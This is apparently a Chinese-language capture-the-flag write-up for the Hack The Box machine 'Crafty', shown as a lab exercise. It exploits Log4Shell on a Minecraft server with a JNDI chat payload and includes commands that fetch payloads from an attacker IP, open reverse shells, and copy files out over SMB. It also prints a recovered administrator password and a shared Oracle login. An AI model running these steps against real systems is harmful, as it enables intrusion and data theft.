data:image/s3,"s3://crabby-images/2e846/2e846af92d25f041622bdc05f12c926bbc4f6d27" alt=""
0x01 端口扫描
data:image/s3,"s3://crabby-images/23012/2301270892f9b7318d9106f291c8938aedf504d6" alt=""
80web、25565mc
data:image/s3,"s3://crabby-images/fcec4/fcec428a4d1b659258fad5c7d608e8836e9f1a71" alt=""
mc版本1.16.5
1 2
| echo "10.129.19.226 crafty.htb" >> /etc/hosts tail -n 1 /etc/hosts
|
data:image/s3,"s3://crabby-images/fd733/fd7333a765530cf18d015cd4f60ff566a9217e48" alt=""
0x02 web
data:image/s3,"s3://crabby-images/2a0dc/2a0dc85786cdd80db6d60ec7aea8f1ae336afed2" alt=""
1 2
| echo "10.129.19.226 play.crafty.htb" >> /etc/hosts tail -n 1 /etc/hosts
|
功能全是未开发,尝试目录爆破:
1
| feroxbuster -u http://10.129.19.226/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
data:image/s3,"s3://crabby-images/eee3a/eee3a97a6def8dead7869effe52cd79b06b1fab3" alt=""
没有结果,转向mc服务
0x03 mc
提到mc的rce,大概率就是log4j
https://software-sinner.medium.com/exploiting-minecraft-servers-log4j-ddac7de10847
本质是远程加载恶意类反弹shell,脚本将启动一个LDAP服务器和一个HTTP服务器,通过在游戏聊天框输入类似${jndi:ldap://localhost:1389/a}
的payload通过jndi远程加载恶意类。
https://github.com/kozmer/log4j-shell-poc
data:image/s3,"s3://crabby-images/8369c/8369c465577c2771cc8320c4a8d7a86e7ec114ff" alt=""
按照文章的利用说明,我们还需要做三个准备:
- 因为是windows机器,需要修改poc中的/bin/sh为cmd.exe
- 在同级目录下下载jdk1.8并解压
- 准备一个游戏启动器
下载jdk时需要账号,可以在https://bugmenot.com/view/oracle.com获得公开账号
erfede@yopmail.com
Bellapete!1
data:image/s3,"s3://crabby-images/ec12a/ec12a33d22485fd238348418ac5440aa33ec3783" alt=""
1
| tar -xf jdk-8u20-linux-x64.tar.gz
|
1
| python3 poc.py --userip 10.10.16.2 --webport 8000 --lport 9999
|
data:image/s3,"s3://crabby-images/1db74/1db748db3cabc3946479e9cd339dbbc81d0b35ba" alt=""
pcl下载1.16.5启动后,聊天框输入${jndi:ldap://10.10.16.2:1389/a}
触发
若出现1.16.5无法添加多人游戏的bug,可参见【技术向】Minecraft1.16.5离线 多人游戏已禁用Bug 修复与分析 - 哔哩哔哩 (bilibili.com)
data:image/s3,"s3://crabby-images/79cbb/79cbb11cf21dca232f99ab5e31da520a8b2904c5" alt=""
0x04 稳固立足点
1
| powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.16.2:8000/fyhypo.exe','fyhypo.exe')"
|
1 2
| gci -r -file c:\users gc C:\users\svc_minecraft\Desktop\user.txt
|
探索web目录:
1
| gci c:\ main.js -Recurse -EA SilentlyContinue
|
没有收获
0x05 提权
枚举
sherlock没有结果、msf的都没有产生会话
data:image/s3,"s3://crabby-images/bf9b0/bf9b06f607cb78b7e0964844fada7d754171d041" alt=""
换winpeas:
1
| smbserver.py share . -smb2support -username fyhypo -password fyhypo
|
1 2
| net use \\10.10.16.2\share /user:fyhypo fyhypo copy .\out.txt \\10.10.16.2\share\out.txt
|
1
| cat out.txt | less -R --mouse
|
打了几十个补丁,且好几个exp因为权限不足运行失败,暂时可以放弃内核提权了
administrator
由于是mc服务器,还有自己写的插件playercounter-1.0-SNAPSHOT.jar
,玩家统计功能,大概率会和服务器进行认证后实时统计,所以对它逆向
1
| jd-gui playercounter-1.0-SNAPSHOT.jar
|
data:image/s3,"s3://crabby-images/0fd1e/0fd1eda7ad5ca7a63d9b1cc12af73876898e72bc" alt=""
data:image/s3,"s3://crabby-images/1f73d/1f73de62702226ae5be3da477c809ed5e2344fc4" alt=""
拿到密码s67u84zKq8IXw,由于交互性太低没法直接在靶机runas后输密码,所以使用psexec或runascs:
1、psexec:
1
| psexec.exe -accepteula -u administrator -p s67u84zKq8IXw -d -i cmd.exe /c "for /f %i in ('whoami') do curl http://10.10.16.2:9999/%i"
|
data:image/s3,"s3://crabby-images/a3f46/a3f46e1a948e7b065681308e878a9faf15aa9c36" alt=""
1
| psexec.exe -accepteula -u administrator -p s67u84zKq8IXw -d -i cmd.exe /c "c:\ProgramData\app\fyhypo.exe"
|
data:image/s3,"s3://crabby-images/03a55/03a55a595a9ca17d6356b2c9c19e1b773ee9cd0f" alt=""
2、runascs:
1 2
| powershell "iwr http://10.10.16.2:8000/runascs.exe -outfile runascs.exe" .\runascs.exe administrator s67u84zKq8IXw powershell -r 10.10.16.2:8888 -t 0
|
data:image/s3,"s3://crabby-images/65379/65379536a33be3861dfa2c239f20e3a8804eb2b1" alt=""
system
现在已经拿到了administrator,那么只需要psexec -s
就拿到了system的shell
1
| psexec-x64.exe -s -accepteula -i cmd.exe /c "c:\ProgramData\root.exe"
|
1
| xcopy "c:\Users\svc_minecraft\server" "\\10.10.16.2\share" /E /I
|